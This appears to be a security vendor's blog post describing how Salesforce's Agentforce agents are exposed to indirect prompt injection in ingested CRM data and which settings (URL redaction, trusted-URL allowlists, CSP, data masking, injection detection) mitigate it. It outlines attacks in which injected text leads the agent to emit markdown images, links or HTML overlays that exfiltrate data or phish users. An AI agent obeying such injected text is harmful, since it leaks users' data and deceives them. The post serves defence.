Blog

Table of Content

One key way Salesforce mitigates AI risk

Agentforce, Salesforce's agentic AI, faces data exfiltration and phishing threats stemming from indirect prompt injection; we detail how it mitigates this risk.

What is Agentforce, and what risks does it face?

Agentforce is Salesforce's agentic AI layer. Its agents read CRM records, draft communications, and take actions, returning generated output to users inside the Salesforce web app.

Because those agents act on data they ingest (for example, Web-to-Lead submissions), an attacker who places an indirect prompt injection in that data can manipulate the agent's output to attempt several well-known attacks:

The first three attacks described above share a key characteristic: an attacker-controlled URL surviving into the agent's rendered output.

The defense: URL redaction

When an agent's response is rendered inside the Salesforce web app, any URL not demarcated as a trusted URL is stripped from the output and replaced with the literal string [URL_REDACTED]. Because Markdown and HTML-based data exfiltration attacks rely on untrusted URLs reaching rendered output, redacting untrusted URLs serves as a powerful defense to reduce the attack surface.

How redaction addresses risks

Attack
How Redacting URLs Mitigates It
Data exfiltration via markdown image
The agent emits a markdown image whose URL carries stolen data to an attacker-controlled server, firing on render.
The untrusted image URL is replaced with [URL_REDACTED], so the browser never makes the request that leaks the data.
Phishing via markdown link
A 'click to reauthenticate' link carries data out or points the user to a fake login.
The clickable link is replaced with [URL_REDACTED], so there is nothing for the user to click.
Data exfiltration via HTML/CSS
An image, iframe, or CSS background in agent-output HTML points at an attacker-controlled domain, firing a request on render.
URLs inside HTML and CSS are redacted too: the attacker-controlled image, iframe, or background source is replaced with [URL_REDACTED] before the markup renders, so the request that would carry the data out is never made.
Phishing via HTML overlay
Injected markup draws an attacker-controlled login screen over the chat to harvest credentials.
The fake login screen has to load attacker-hosted content. With those URLs redacted, it has nothing to load.

This analysis describes Agentforce Chat inside the Salesforce web app. Salesforce ships many more AI features, exposes MCP servers, and presents a large attack surface overall, so URL redaction addresses only a subset of the risk. For example, the agent's ability to call tools in Agentforce requires other defenses, such as human-in-the-loop approval, to prevent attacks like the exploit against Microsoft Copilot Cowork.

Salesforce AI Risk Report
Assessing Salesforce AI for your organization?
URL redaction covers one channel. Get the full report on Agentforce's other risks and defenses, and on Salesforce's broader AI attack surface.

Configurations for Salesforce AI output processing

First, we wanted to note that for some use cases, it is necessary to allow certain URLs in model output. To allow specific URLs, configure the following:

Restrict and allowlist output URLs. To allow agents to output external URLs, add each one explicitly:

Setup → Quick Find → "Trusted URLs" → Trusted URLs → New Trusted URL

  • Avoid wildcard patterns that allow any site hosting user-generated or otherwise untrusted content.

  • Set CSP directives in the same settings page to disallow img-src unless images are meant to render from the target domain. This reduces the risk of Markdown image-based data exfiltration.

Next, we note several Salesforce settings that reduce the risk surface for indirect prompt injection:

Mask sensitive data in the Einstein Trust Layer.

Masking data works by substituting sensitive data with a placeholder before a prompt is sent to the LLM. This prevents the agent, under the influence of a prompt injection, from taking actions such as encoding sensitive data and appending the encoded result to a malicious URL.

Configure data masking here:

Setup → Einstein → Einstein Generative AI → Einstein Trust Layer → Data Masking → Large Language Model Data Masking

Turn on Large Language Model Data Masking first; it is the parent category, and the options below are only applicable once it is on.

Pattern-based masking is available and can be enabled for the following data types: Name, Email Address, Phone Number, Credit Card, US SSN, US ITIN, US Drivers License, Passport, IBAN Code, and Company Name.

Data Masking → Pattern-based → Sensitive Data

Field-based masking covers fields by compliance category (PII, HIPAA, GDPR, PCI, COPPA, and CCPA) and by data sensitivity level (Public, Internal, Confidential, Restricted, and Mission Critical).

Data Masking → Field-based → Compliance Categories / Data Sensitivity Levels

Prompt injection detection (beta)

Salesforce additionally offers a prompt injection detection setting:

Setup → Einstein → Einstein Generative AI → Einstein Trust Layer → Safety & Security → Prompt Injection Detection

However, this setting is currently in beta and subject to beta terms; as such Salesforce appears to train AI on customer data when prompt injection detection is enabled.

Salesforce AI Configurations
Want to configure every Salesforce AI privacy and security setting?
See all Agentforce and Einstein configurations recommended for your use case